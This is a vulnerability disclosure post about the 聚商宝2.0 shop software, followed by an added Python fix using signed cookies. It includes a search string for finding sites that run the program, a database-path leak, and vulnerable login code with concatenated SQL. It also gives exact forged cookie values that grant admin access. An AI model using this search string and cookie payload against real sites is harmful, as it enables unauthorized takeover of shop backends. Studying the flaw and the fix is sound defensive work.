聚商宝2.0 vulnerabilities

2011, August 10, 12:40 AM. Original notes
Submitted by admin

FROM http://www.st999.cn/blog BY 久久久电脑

Program: 聚商宝2.0

Download: http://down.chinaz.com/soft/21754.htm

Google search keyword: intext:技术支持:奔明科技 聚商宝

A few days ago, while working on a site, I ran into a program called 聚商宝. I downloaded the source, and only today found time to take a quick look at it...

Vulnerabilities: database path disclosure and admin-backend cookie spoofing

1) Requesting conn/conn.asp directly discloses the database path. Download the database, decrypt the password, and log into the backend.

2) Cookie spoofing. The relevant code fragment from check.asp in the admin folder (the login handler):

<%
' Fragment of admin/check.asp as posted. The Sub ErroFy() definition sat inside the
' If block in the pasted snippet; VBScript only allows procedure definitions at script
' level, so it is hoisted here. Its behaviour is unchanged.
Sub ErroFy()
  ' Error page: wrong verification code, then stop processing
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误!</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt;&lt; 返回上一页</a></td>"
  response.write"</tr>"
  response.write"</table>"
  Response.End()
End Sub

dim uid,upwd
uid=Replace_Text(Request.Form("userid"))
upwd=md5(Replace_Text(Request.Form("password")),16)   ' 16-character MD5 of the submitted password
Verifycode=Replace_Text(request.Form("verifycode"))

if not isnumeric(Verifycode) then
  Call Logerr()
  Call ErroFy()
end if

if Cint(Verifycode)<>Session("SafeCode") then
  Call ErroFy()
else
  Set rs=server.createobject("adodb.recordset")
  sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
  rs.open sqltext,conn,1,1
  If Rs.Eof And Rs.Bof Then
    ' Error page: unknown username or wrong password
    response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
    response.write"<TR>"
    response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
    response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正确!</div></td></tr>"
    response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt;&lt; 返回上一页</a></td>"
    response.write"</tr>"
    response.write"</table>"
  else
    ' Login succeeded. The admin identity is stored in three plain, unsigned
    ' cookies; the backend pages trust these values as sent by the client,
    ' which is the flaw described in this post.
    Response.Cookies("globalecmaster")=rs("username")
    Response.Cookies("masterflag")=rs("flag")
    Response.Cookies("adminid")=rs("id")
    LastLogin=Date()
    LastLoginIP=getIP()
    sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'"
    conn.execute(sql)
    ' Success page, then redirect to index.asp after 2 seconds
    response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
    response.write"<TR>"
    response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>"
    response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台管理员身份认证!<br><br>2秒后自动进入后台...</div></td></tr>"
    response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理</a></td>"
    response.write"</tr>"
    response.write"</table>"
%>
<meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
<%
  end if
  rs.close
  set rs=nothing
end if
%>

 

Exploitation: open the backend directly with 啊D, set the following cookies, then request admin/index.asp to log in.

globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1
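The root cause is that admin/index.asp trusts three cookies (globalecmaster, masterflag, adminid) that the client can set to anything. The fix is to stop treating client-supplied values as identity: in classic ASP, keep the logged-in user in Session instead of Response.Cookies, or, if a cookie must carry the identity, bind it to a server-side secret. The Python example below is added here and is not code from the original post or from 聚商宝; it shows the second approach generically. The single cookie name `globalec_auth`, the secret value and the sample cookie header are all constructed for the example, and the "legacy" header is the forged value from the post, which a server using the signed cookie simply ignores.

```python
import base64
import binascii
import hashlib
import hmac
import json
import time
from http.cookies import CookieError, SimpleCookie
from typing import Optional

# Constructed placeholder: in production this is a random secret held only on the
# server, never in the application source or in any cookie.
SECRET_KEY = b"constructed-example-secret-change-me"

# Hypothetical single signed cookie that replaces the three plain ones.
COOKIE_NAME = "globalec_auth"

# The three unsigned cookies from the post, as a browser would send them (constructed header).
LEGACY_FORGED_HEADER = (
    "globalecmaster=admin; "
    "masterflag=01%2C%2002%2C%2003%2C%2004%2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; "
    "adminid=1"
)


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text.encode("ascii"))


def issue_admin_cookie(secret: bytes, username: str, flag: str, adminid: int,
                       issued_at: Optional[int] = None) -> str:
    """Serialize the identity the login page spread over three cookies into one
    payload and append an HMAC-SHA256 tag computed with the server secret."""
    payload = json.dumps(
        {"u": username, "f": flag, "id": adminid,
         "t": int(time.time()) if issued_at is None else issued_at},
        separators=(",", ":"), sort_keys=True,
    ).encode("utf-8")
    tag = hmac.new(secret, payload, hashlib.sha256).digest()
    return _b64e(payload) + "." + _b64e(tag)


def verify_admin_cookie(secret: bytes, value: str, max_age: int = 3600,
                        now: Optional[int] = None) -> Optional[dict]:
    """Return the identity dict only if the tag matches and the cookie is fresh;
    None for anything forged, tampered with, malformed or expired."""
    try:
        payload_b64, tag_b64 = value.split(".", 1)
        payload = _b64d(payload_b64)
        tag = _b64d(tag_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    try:
        data = json.loads(payload)
    except ValueError:
        return None
    if not isinstance(data, dict) or not isinstance(data.get("t"), int):
        return None
    current = int(time.time()) if now is None else now
    if current - data["t"] > max_age:
        return None
    return data


def admin_from_cookie_header(secret: bytes, header: str,
                             now: Optional[int] = None) -> Optional[dict]:
    """What the backend entry page should do: ignore globalecmaster, masterflag
    and adminid entirely and accept only a validly signed cookie."""
    jar = SimpleCookie()
    try:
        jar.load(header)
    except CookieError:
        return None
    if COOKIE_NAME not in jar:
        return None
    return verify_admin_cookie(secret, jar[COOKIE_NAME].value, now=now)


def tamper_adminid(value: str, new_id: int) -> str:
    """Rewrite the payload (for instance to adminid=1) while keeping the old tag;
    without the secret this is all a client can do, and verification rejects it."""
    payload_b64, tag_b64 = value.split(".", 1)
    data = json.loads(_b64d(payload_b64))
    data["id"] = new_id
    forged = json.dumps(data, separators=(",", ":"), sort_keys=True).encode("utf-8")
    return _b64e(forged) + "." + tag_b64


if __name__ == "__main__":
    good = issue_admin_cookie(SECRET_KEY, "editor", "01, 02", 7, issued_at=1000)
    print(verify_admin_cookie(SECRET_KEY, good, now=1500))                     # identity dict
    print(verify_admin_cookie(SECRET_KEY, tamper_adminid(good, 1), now=1500))  # None
    print(admin_from_cookie_header(SECRET_KEY, LEGACY_FORGED_HEADER))          # None
```

The issuance timestamp plus `max_age` gives the cookie a lifetime, which the original three cookies lacked; the flag list from the post (`01, 02, ...`) travels inside the signed payload rather than as its own editable cookie, so granting extra flags by editing the cookie is detected the same way as changing the id.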

 

Tags: 聚商宝
